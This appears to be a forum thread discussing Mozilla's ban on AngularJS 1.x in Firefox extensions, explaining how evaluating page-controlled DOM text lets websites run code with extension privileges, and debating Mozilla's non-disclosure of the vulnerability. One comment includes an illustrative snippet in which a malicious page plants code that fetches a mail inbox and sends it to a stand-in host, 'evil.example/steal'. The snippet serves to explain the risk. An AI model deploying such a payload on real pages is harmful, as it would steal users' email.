I'm not sure if this is the same case, but I assume it is: if you're wondering why the researcher doesn't want to share the vuln listen to this talk:
https://www.youtube.com/watch?v=U4e0Remq1WQ
Roughly at 41:30 he explains why he doesn't want to disclose the vuln. The tl;dr is that he thinks the sandbox is broken beyond repair and that whatever fix they come up with, he can create another bypass for the sandbox. But he doesn't want to do this all the time, and he needs his vuln as a PoC to show to customers if they abuse the sandbox.
That doesn't make much sense. If there's a vulnerability in Angular, doesn't it mean that there's a vulnerability in the JS engine that runs the Firefox addons? And in that case, can't an attacker replicate whatever Angular is doing to make an exploit? Basically it sounds like it's something for Mozilla to fix, not the Angular team.
Angular runs eval-like functions on HTML in the DOM. The DOM can be controlled by the webpage. When Angular runs in an extension (which has more permissions than the page) using the DOM controlled by the webpage, then the webpage can write code into the DOM that Angular executes from within the extension's security context. It's not the browser's fault that Angular trusts the webpage's DOM like that; Angular just isn't built for extensions.
Yes, but in a browser extension context the web page controls the HTML involved and is the thing you want to defend against. So relying on the HTML to play nice is not OK.
Exactly. If you can write a vulnerability in Angular, you can write it in vanilla Javascript as well. Unless Angular is using `eval()` or something and Firefox bans any use of `eval()`, which is reasonable...
Which it is, as far as I can see, though it tried to make it slightly safer ... until version 1.6, when it gave up on pretending it's at all safe. The linked slide share from the github issue talks about this a bit. See http://www.slideshare.net/x00mario/an-abusive-relationship-w... slides 16-31 which talk about the sandbox angular tried to apply to the environment it did the eval() in, but in the end it's grabbing text from the DOM and doing an eval().
Note that in a browser extension, taking text from the DOM (controlled by the web page) and doing an eval on it (with the privileges of the extension!) is obviously really, really bad.
[Disclaimer: I work for Mozilla and I'm not an expert on Angular.]
Firefox Addons Marketplace reviews and bans malicious and insecure extensions. There are legitimate uses of eval. Angular's use of eval (on DOM content) is insecure within the context of browser extensions.
Yes, you can write vulnerable code in plain javascript:
eval(document.querySelector('.foo').textContent);
In a regular web page where you don't allow the user to insert arbitrary HTML, it's a perfectly fine line allowing you to store code in the DOM.
If you do that in a browser extension where the DOM is controlled by the web page, then you've got a big security vulnerability: the webpage can put anything it wants into an element with class "foo" and then your extension will execute it with its privileges! Your extension will be taken down from the Firefox Addons Marketplace if it's reviewed and this line is found running. If lots of extensions added this line, then Mozilla would probably automate blocking extensions from containing it.
Angular 1.x does something like this line. It's perfectly fine in web pages where you control the DOM, but is insecure if the DOM comes from an untrusted outsider!
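For illustration, here is roughly what a malicious page could do if it suspected a visiting extension ran the line above against its DOM (the URLs are made up):

  // on the malicious page: plant code where the extension's eval will find it
  var el = document.createElement('div');
  el.className = 'foo';
  el.textContent =
    "fetch('https://mail.example.com/inbox', {credentials: 'include'})" +
    ".then(r => r.text())" +
    ".then(t => fetch('https://evil.example/steal', {method: 'POST', body: t}))";
  document.body.appendChild(el);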
I had an extension a while ago that I was attempting to publish to the Firefox app store and it was rejected on grounds of using eval. I don't remember why I needed to use eval, but basically this is something they do already. I'm guessing that previously they were allowing for an Angular exception.
Lots of perfectly sensible JavaScript code uses eval for things like feature detection and runtime code generation. If you removed eval they'd just use 'new Function' instead, which has most of the same problems.
I have no information one way or the other, but maybe the issue isn't that angular can do it, but that angular does do it. So any extension using angular is vulnerable by default.
I read that and said a literal WTF. How is it at all acceptable to honor such a request? What possible good reason could there be?
Unless the discloser was the US Government and the request was actually a court order. But this seems ludicrous. If they require secrecy around the exploit, they wouldn't have disclosed it to Mozilla at all.
Mozilla is probably unable to disclose not just the vulnerability, but other surrounding info they may have been provided, including which other parties have received that info. They are not saying the Angular team is unaware of the problem, right? Only that they themselves are not the ones reporting it.
If you don't honor such a request without a VERY STRONG reason, nobody in their right mind will ever disclose anything to you ever again. Right now we don't and can't know if such a strong reason exists.
"They are not saying the Angular team is unaware of the problem, right?"
Are we just going to assume the folks at Mozilla are clairvoyant? How would they know what the Angular team knows? If it's known in general that the Angular team already knows about this issue, perhaps through other means, then the statement that they haven't disclosed it to the Angular team makes no sense. The statement is, "Mozilla is choosing to do its part to keep Angular in the dark about this."
Mozilla is definitely in a position to reject NDA protected security information, but then they wouldn't have been privy to the security information which a researcher was conditionally offering.
Would it be better to reject the information outright? Or would you suggest that Mozilla make agreements in bad faith, deceitfully agreeing to terms they don't intend to honor?
I have no idea if that is the case here, but it is completely normal that some vulnerabilities have a set disclosure date to allow for coordinated responses. You can either get the information early but under non-disclosure, or along with everyone else. Most people play by these rules (with a few notable exceptions).
> Unless the discloser was the US Government and the request was actually a court order.
If this were the case, I think it's actually the best reason to disregard the request of the discloser and disclose, as it's now in the public interest (ie, closing a possible backdoor being used to surveil dissidents, etc), not merely part of a private agreement.
But yeah, if mozilla signed an NDA on this, that seems like it was a bad move from the get-go.
If the vulnerable part is in Angular, there's a 100% chance that someone can write code in plain JS that is vulnerable to the same attack. E.g. if there was something in the hashbang-url-router that would lead to eval'ing the code in the hash (which I just made up, but would describe such a class of vulnerability). This means it's pointless to ban Angular.
If something Angular does triggers an issue in the Firefox JS engine, it is Firefox that should be fixed, instead of allowing essentially a 0day exploit to be alive.
> If the vulnerable part is in Angular, there's a 100% chance that someone can write code in plain JS that is vulnerable to the same attack.
“can”, not “will”. If everything that uses Angular is vulnerable (unlikely? I couldn’t say), why would you not ban it? This is along the lines of “If Heartbleed is in OpenSSL, there’s a 100% chance that someone can write code in plain C that is vulnerable to the same attack”. Yeah, they can, and it happens all the time, but why not fix a known hole?
> E.g. if there was something in the hashbang-url-router that would lead to eval'ing the code in the hash (which I just made up, but would describe such a class of vulnerability). This means it's pointless to ban Angular.
This would be an excellent reason to ban Angular since a huge majority* of extensions never use eval().
* If this isn’t true… I don’t want to be in web dev anymore.
As AgentME clarifies above, Angular uses a lot of `eval()` of DOM elements, which is a perfectly reasonable design decision when you control the contents (as you would if you used Angular in your own app), but a perfectly awful thing to do if the attacker controls the contents (as they would if you used Angular in a browser extension that processes 3rd-party webpages).
> there's a 100% chance that someone can write code in plain JS that is vulnerable to the same attack
This is plainly false - please don't spread fear where it doesn't belong.
I'm sure you can think of some things that, when written into the privileged environment of an addon, create vulnerabilities that aren't possible in "plain JS."
There is nowhere near a "100% chance" that this is a problem for web apps that don't run as browser extensions.
Let me make sure I understand this. This vulnerability is basically because the addon authors are using angular to parse webpages, and therefore because they don't have control over the DOM elements angular is being used on, they're vulnerable to all the xss escapes in [0], right?
Because as far as I can tell, all of the escapes in [0] require the attacker to write to the DOM being evaluated by the angular engine. Normally this isn't a big deal, because the developer controls the DOM. In more pedestrian situations, if you've got a wiki, cms, forum, or other situation where untrusted people are creating content, you can't give those content creators the ability to write to parts of the DOM where an xss abuse might happen, and if you do it is pretty much your fault anyway (angular isn't really to blame here, because if you're letting users write to the DOM directly you've got trust issues).
The Mozilla situation is particularly problematic because the Mozilla addon runs its javascript context in some elevated privilege mode, and normally that javascript just manipulates the DOM directly to generate addon-specific UI (like password fill helpers, for example). But because that Angular is being run on a DOM outside of the control of the addon authors, it's also subject to all kinds of XSS escapes.
I get that, it's fair. Seems like, though, this isn't really an angularjs issue specifically. It feels like this is a broad problem with the security model for browser addons. Like: replace angular with some other view library that you rolled yourself and it could still have all kinds of issues.
Basically anything that uses the DOM to store state (instead of a one-way state -> dom transformation) is subject to manipulation by malicious DOM injections, be they from forum posters or creators of pages that will be visited by plugin users. So, again: I see why angular1 has issues here. But this is a much bigger security hole, honestly. I don't think the javascript runtime for plugins should expose anything to the js running on the page, but that's a lot more complicated, since the plugin runtime is almost always really interested in spidering the page DOM and altering it by responding to the state of that DOM.
>I don't think the javascript runtime for plugins should expose anything to the js running on the page, but that's a lot more complicated, since the plugin runtime is almost always really interested in spidering the page DOM and altering it by responding to the state of that DOM.
Firefox/Chrome/Safari extensions already run in an "isolated world" so that they have separate sets of global variables and DOM-wrappers, so that javascript values never leak directly and modifications to globals don't affect other worlds. However, they all see and manipulate the same content in the DOM. I'm unsure if you're proposing anything different from the current situation.
If there is some permutation of JavaScript statements (library or otherwise) that displays a security vulnerability for the user, isn't that the browser's fault and not the application's? And isn't library detection just a hacky substitute for an actual fix of said fault?
It's not the browser's fault if an extension has a vulnerability which gives away the capabilities the extension was given. It would be the browser's fault if the extension had a vulnerability which somehow managed to give away more permissions than the extension was given in the first place.
In this specific case, Angular runs eval-like functions on HTML in the DOM. The DOM can be controlled by the webpage. If Angular is running in a higher-privilege extension, then the webpage can put code in the DOM and let Angular execute it from within the extension. This seems to be a fundamental part of Angular 1.x's design. It just isn't built for this use case.
The extension has access to certain information provided by the user and the browser. Due to a vulnerability, that information is no longer secure, and may be used in ways that the user of the extension does not expect nor has approved. The platform holder treats vulnerable extensions as if they were effectively malware, and bans them.
Hard to go deeper without further information, but it makes sense to me.
I am really worried about the security implications for addons like bitwarden, if mozilla is right about this. I hope that competent people will take a close look.
Isn't any "vulnerability" in a JS framework a vulnerability in the browser's own handling of securing it? Like, there is nothing angular is doing that someone else couldn't do, intentionally, to create said issue, right? Wouldn't the correct handling of this to be to secure the damned interpreter thats running the code to prevent it from having the effect they are trying to mitigate?
Angular evals text stored in the DOM. If you alone are in control of the DOM (like in a normal webpage), there's no issue. If someone else is in control of the DOM (you're running Angular in a higher-privileged extension on a random webpage's DOM), then they can put code into the DOM which gets picked up by Angular and executed within the extension with the extension's full permissions. This isn't an issue inherent to the language or the browser at all. The issue comes from the fact that Angular 1.x is designed for use cases where the DOM is trusted, and that's not the case for browser extensions.
But that's not special to Angular... right? You can write that in vanilla JavaScript just the same - the issue is that the script running in the extension is given the ability to do that. They don't seem to be blocking a feature in JavaScript, they seem to be blocking a lib that uses it. Angular can't do ANYTHING that any other bit of JavaScript can't do in the same context.
Angular is just JS; it's not special JS, it's just JS. If Angular can do something, it can be done without Angular, so blocking Angular does nothing to prevent the vulnerability.
Eval has legitimate uses, and there's plenty of ways that extensions can be insecure or malicious without using eval.
Firefox's Addons Marketplace reviews extensions and rejects ones that are malicious or insecure.
The issue is not that Angular uses an inherently insecure feature. The issue is that Angular does insecure things: it lets a webpage run any code with the extension's privileges. If the extension has privileges for your email domain, then the webpage can abuse the extension's privileges to harvest your email. An extension that let your email be harvested would get rejected regardless of whether it used eval or not. (For example, a malicious extension could be made which doesn't use eval and is just a couple of hard-coded lines making privileged AJAX connections to gmail.com. There are no technical features the extension would be using that shouldn't be available.)
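For instance, something like this hypothetical handful of lines would be just as rejectable, with no eval in sight (the URL and the host permission are invented for illustration):

    // background.js -- assumes the manifest requests a host permission
    // such as "https://mail.example.com/*"
    fetch('https://mail.example.com/inbox', { credentials: 'include' })
      .then(function (res) { return res.text(); })
      .then(function (html) {
        // a malicious author would parse and exfiltrate this; no eval anywhere
      });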
Uhm, wait, what? Firefox extensions can execute literal code from a visited website?
To me that sounds like the root cause of the problem and a glaring security hole - either the website has to be sanitized/projected into a harmless dom abstraction or extensions shouldn't be able to use any kind of dynamic evals.
Sure, Angular may be vulnerable by default, but good luck assuming that all the other extensions out there are safe and never use eval at any point.
>either the website has to be sanitized/projected into a harmless dom abstraction
Should Firefox contain code to recognize text that looks like Angular templates and then break it somehow? That'd be extremely specific.
Eval isn't an inherently unsafe feature, and it doesn't have a monopoly on insecurity: Angular doesn't even require eval. It can run without eval in a CSP-supporting mode that's equally vulnerable.
Angular 1.x is still being actively developed and it will be many years before it becomes unsupported. I'm sure that if they reported the vulnerability it would be fixed quickly, given the amount of activity on GitHub.
The issue is a fundamental part of Angular 1.x's design. It runs eval on text within the page DOM. This isn't secure within extensions where the page DOM is controlled by the webpage, and Angular is running within a higher-privileged extension.
> Angular is running within a higher-privileged extension.
Ok, thanks for the explanation. I've developed Chrome extensions before, but Firefox only a very long time back, so my knowledge is rusty. Please tell me two things:
1. Say, hypothetically, if AngularJS can do it, doesn't that mean any JavaScript can do it too? I mean JavaScript contained within the extension code?
2. In Chrome extensions we use "ng-csp", otherwise it won't run. Is this addressing the same thing in Chrome, and if so, why can't it do that in Firefox?
>1. Say, hypothetically, if AngularJS can do it, doesn't that mean any JavaScript can do it too? I mean JavaScript contained within the extension code?
Angular doesn't have a monopoly on insecure code! Anyone can write insecure or malicious code. Firefox's Addons Marketplace will reject an insecure extension just the same when they notice anything amiss, whether it uses Angular or not.
>2. In Chrome extensions we use "ng-csp", otherwise it won't run. Is this addressing the same thing in Chrome, and if so, why can't it do that in Firefox?
Chrome enforces a CSP directive that prohibits eval in UI pages. This is unrelated to Angular being insecure to use in extension content scripts. (When I've said a few times that Angular is insecure because it "evals content from the DOM", I'm not trying to be specific to the `eval` function. I think its CSP fallback is just as insecure.) Angular 1.x is bad news in Chrome content scripts just the same.
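For reference, ng-csp (written as <html ng-app ng-csp> in the extension's own pages) just tells AngularJS to interpret expressions instead of compiling them with Function(); it doesn't change what gets evaluated. A minimal sketch of why that distinction doesn't help (the expression string is a stand-in for whatever the page put in its DOM):

    angular.injector(['ng']).invoke(function ($parse) {
      var untrusted = '1 + 1';             // imagine this was scraped from the page's DOM
      console.log($parse(untrusted)({}));  // 2 -- evaluated whether or not eval is allowed
    });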
That suddenly makes Angular look scary for some clients: a vulnerability that is known to an entity or entities but unknown to the Angular developers or contributors...
The vulnerability occurs only if you inject Angular into a web page from a browser extension in some browsers. There is no vulnerability if you are writing a SPA using Angular.
Overkill for what was never intended to be a sandbox for untrusted code. The "sandboxing", like that of Django templates, Jinja, Nunjucks, etc., is a well-intended measure to keep logic out of templates, but in practice it mostly just gets in the way and creates mistaken assumptions about security.
I can't help but think that he's right though. Not explicitly but implicitly. By keeping the vulnerability from the dev team they're allowing it to stay out in the wild. No?
There's a world of difference between an exploit being known to someone and that exploit being put up for sale on the black market. In either case, if the researcher who found the exploit sold it, that hardly makes Mozilla complicit in his actions.
I am not sure that I agree. It's hard for me to say where the responsibility for disclosure lies, but if I was Mozilla I'd need to find a good reason not to disclose such a vulnerability to the project owner/development team.
I am not sure that being asked not to disclose is a good enough reason without further justification; in fact it seems like a poor reason to me. Mozilla is in my view kind of a shepherd for internet users and I'd hope they'd fall more on the side of "let's not let our users get owned unnecessarily" than that of "let's sit on this vulnerability just because the disclosing party asked us to."
Well, first of all if they disclosed it they would likely be sued for violating an NDA. Secondly, this would set a bad precedent because now who would ever trust Mozilla with a vulnerability that's behind an NDA?
Isn't it a little soon to be judging them at all? We don't even know if this affects regular use of Angular (on websites) rather than just rare use cases like browser extensions.
That was the way I read it initially too. I think the intended meaning was that we don't know anything about it, up to and including this ridiculous claim. It's more to highlight the lack of transparency than to actually put forth a viable theory.
What do you mean when you say you didn't frame it as a legitimate theory? Are you saying it's an illegitimate theory, as in you yourself don't believe it's true?
It was hyperbole. I personally think the language is clear, too. Here's a good post explaining the usage of the phrase "For all I know", since apparently HN isn't familiar with the idiom: https://english.stackexchange.com/questions/92207/what-is-th...
His statement was literally correct, and useful in highlighting a different perspective on what is known to be known. The negativity seems to stem from not taking it literally.
Occam says that the security researcher has notified critically affected parties through the normal channels, and Mozilla and others are embargoed from talking about it until it's been fixed?
This thing makes me believe that we should not use any OSS project released by a big company such as Google or Microsoft. Even if they don't say they're dropping support, once they start working on another project it won't be a community-driven project and will slowly die.